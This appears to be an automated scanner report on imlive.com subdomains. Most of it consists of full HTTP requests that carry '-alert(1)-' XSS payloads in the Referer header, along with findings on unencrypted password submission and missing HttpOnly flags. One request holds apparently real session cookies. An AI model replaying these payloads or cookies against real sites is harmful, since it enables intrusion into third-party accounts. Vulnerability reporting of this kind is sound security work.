Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: in.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=cbbcb'-alert(1)-'3f0965cdc19
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59e4e'-alert(1)-'86c82395764 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: in.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=59e4e'-alert(1)-'86c82395764
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a33e'-alert(1)-'3a6e8f04043 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=5a33e'-alert(1)-'3a6e8f04043
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60b0b'-alert(1)-'74ef2eb4a5d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=60b0b'-alert(1)-'74ef2eb4a5d
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3539e'-alert(1)-'9d756dfe67 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: jp.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=3539e'-alert(1)-'9d756dfe67
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c88b2'-alert(1)-'2a63c42b092 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: jp.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=c88b2'-alert(1)-'2a63c42b092
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8dd73'-alert(1)-'7a8d4483e55 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: mx.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=8dd73'-alert(1)-'7a8d4483e55
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71b4f'-alert(1)-'69efbaaf3ed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: mx.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=71b4f'-alert(1)-'69efbaaf3ed
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d6e9'-alert(1)-'53afcdd47c4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: nl.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=5d6e9'-alert(1)-'53afcdd47c4
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c478e'-alert(1)-'b70284934ea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: nl.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=c478e'-alert(1)-'b70284934ea
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffa0b'-alert(1)-'f8b58c61969 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: no.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ffa0b'-alert(1)-'f8b58c61969
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a5a6'-alert(1)-'f51a024305a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: no.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=7a5a6'-alert(1)-'f51a024305a
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98560'-alert(1)-'35d8e8b408e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: pu.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=98560'-alert(1)-'35d8e8b408e
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e7e1'-alert(1)-'d1ec1d083c3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: pu.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=3e7e1'-alert(1)-'d1ec1d083c3
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48c4b'-alert(1)-'aa630895a23 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: ru.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=48c4b'-alert(1)-'aa630895a23
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa18c'-alert(1)-'e132931c5dd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: ru.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=aa18c'-alert(1)-'e132931c5dd
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72d2d'-alert(1)-'c3f6f59e0c0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: se.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=72d2d'-alert(1)-'c3f6f59e0c0
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de5e2'-alert(1)-'3ba738e3b95 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: se.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=de5e2'-alert(1)-'3ba738e3b95
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50d83'-alert(1)-'43e531d6dcf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=50d83'-alert(1)-'43e531d6dcf
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d19fe'-alert(1)-'3e5a0cefaf9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=d19fe'-alert(1)-'3e5a0cefaf9
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /homepagems3.asp HTTP/1.1 Host: imlive.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: br.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: br.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: fr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: fr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
